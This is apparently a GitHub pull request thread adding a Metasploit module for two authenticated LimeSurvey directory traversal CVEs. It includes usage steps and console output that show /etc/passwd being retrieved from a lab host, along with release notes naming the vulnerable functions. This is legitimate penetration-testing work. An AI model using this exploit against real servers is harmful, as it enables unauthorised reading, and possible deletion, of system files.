limesurvey dir traversals

[h00die]

This PR adds 2 directory traversals for LimeSurvey.
The two CVEs I found were very similar, and most of the login/generic stuff overlapped, so I just put it in one module. This gives coverage back to at least Sep 25, 2017. The one

@mattaberegg credits for the newer CVE (do you want an email added, and do you know Michael Burkey's github?)

This module has been verified against the following versions:

• 4.1.11-200316 (the file retrieved will attempt to be deleted by the webapp)
• 3.15.0-181008
• 3.9.0-180604
• 3.6.0-180328
• 3.0.0-171222
• 2.70.0-170921

Verification

• install the app, its on github w/ a ton of releases
• Start msfconsole
• use auxiliary/scanner/http/limesurvey_zip_traversals
• give it a good file, and creds
• run
• Verify you get the file. It doesn't print the contents in case it was something not screen friendly.
• Document looks good

[mattaberegg]

No need to add an email, thanks. Michael's github is @mburkey6

[h00die]

@mburkey6 if you want an email added, just put it here and i'll add it!

[mburkey6]

You do not need to add an email for me either. Thanks for asking though!

…

On Wed, Apr 8, 2020, 3:33 PM h00die ***@***.***> wrote: @mburkey6 <https://github.com/mburkey6> if you want an email added, just put it here and i'll add it! — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#13215 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AMNE3VF2MHM2QUP24J75FE3RLTGQZANCNFSM4MEEZSIQ> .

[space-r7]

Thanks, @h00die! I went ahead and tested against versions 3.15.7-190124 and 4.0.1-200120. Code looks good to me, so I can get this landed soon!

Test output:

msf5 > use auxiliary/scanner/http/limesurvey_zip_traversals
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > options

Module options (auxiliary/scanner/http/limesurvey_zip_traversals):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      7                yes       Traversal Depth (to reach the root folder)
   FILE       /etc/passwd      yes       The file to retrieve
   PASSWORD   password         yes       LimeSurvey Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the LimeSurvey installation
   THREADS    1                yes       The number of concurrent threads (max one per host)
   USERNAME   admin            yes       LimeSurvey Username
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set rhosts 192.168.37.147
rhosts => 192.168.37.147
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set targeturi limesurvey-3.15
targeturi => limesurvey-3.15
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set verbose true
verbose => true
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > run

[*] CSRF: YII_CSRF_TOKEN => bDQ3XzVMYVF6czVyZlZSYW9-RzVnemtTTzRHeHp1c0e-_2uDc8l5t81_sXpcXxhC3AUe0NerypvJmhtH_emjOA==
[+] Login Successful
[*] Version Detected: 3.15.7
[*] Attempting to retrieve file
[+] File stored to: /Users/space/.msf4/loot/20200414112938_default_192.168.37.147__701555.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set targeturi limesurvey-4.0
targeturi => limesurvey-4.0
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > run

[*] CSRF: YII_CSRF_TOKEN => ZzJnVzJfSFBKZkRqZHU2UzVWbXRTUDRGNjQ5elBVU0Ml1jqeqjrvPzGD3K3do2wS96nyh_DuRbk5YLMFC2DFdw==
[+] Login Successful
[*] Version Detected: 4.0.1
[*] Attempting to retrieve file
[-] This method will possibly delete the file retrieved!!!
[+] File stored to: /Users/space/.msf4/loot/20200414113001_default_192.168.37.147__932337.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set FILE /etc/apache2/apache2_blah.conf
FILE => /etc/apache2/apache2_blah.conf
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > run

[*] CSRF: YII_CSRF_TOKEN => ZFJLckl0Y1FLNWxBZmRJX0pSWDg5dzd-djg0aXJYUknqBKdW9dCjQYAujtx6gCu7iWyuoAZw5fXov37Lfg4PGg==
[+] Login Successful
[*] Version Detected: 4.0.1
[*] Attempting to retrieve file
[-] This method will possibly delete the file retrieved!!!
[-] File not found or server not vulnerable
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[space-r7]

Release Notes

A new auxiliary module , modules/auxiliary/scanner/http/limesurvey_zip_traversals that exploits two separate authenticated directory traversal vulnerabilities in LimeSurvey, CVE-2019-9960 and CVE-2020-11455. For versions between v4.0 and v4.1.11, the getZipFile() function allows for the download of arbitrary files due to insufficient sanitization of the path parameter. For versions v3.15.9 and lower the downloadZip() function enables arbitrary file downloads via the unsanitized szip parameter.

[h00die]

Thanks @space-r7